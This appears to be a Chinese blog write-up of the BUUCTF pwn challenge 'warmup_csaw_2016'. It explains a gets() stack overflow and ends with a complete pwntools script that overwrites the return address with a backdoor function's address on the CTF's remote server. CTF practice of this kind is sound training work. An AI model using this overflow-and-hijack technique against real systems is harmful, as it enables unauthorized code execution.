BUUCTF-PWN-warmup_csaw_2016

78次阅读
没有评论

共计 271 个字符,预计需要花费 1 分钟才能阅读完成。

提醒:本文最后更新于 2024-08-27 15:42,文中所关联的信息可能已发生改变,请知悉!

BUUCTF-PWN-warmup_csaw_2016

checksec

BUUCTF-PWN-warmup_csaw_2016

IDA

BUUCTF-PWN-warmup_csaw_2016

BUUCTF-PWN-warmup_csaw_2016

很明显可以通过 gets 函数溢出到后门函数。

v5 的栈情况:

BUUCTF-PWN-warmup_csaw_2016
BUUCTF-PWN-warmup_csaw_2016

所以需要覆盖的是长度为(0x40 + 0x8)

EXP

from pwn import *

# p = process('./warmup_csaw_2016')
p = remote('node4.buuoj.cn', 25085)

payload = b'a' * (0x40 + 0x8) + p64(0x40060d)
p.sendline(payload)
p.interactive()

结果

BUUCTF-PWN-warmup_csaw_2016

正文完
 0
icvuln
版权声明:本站原创文章,由 icvuln 于2021-11-03发表,共计271字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)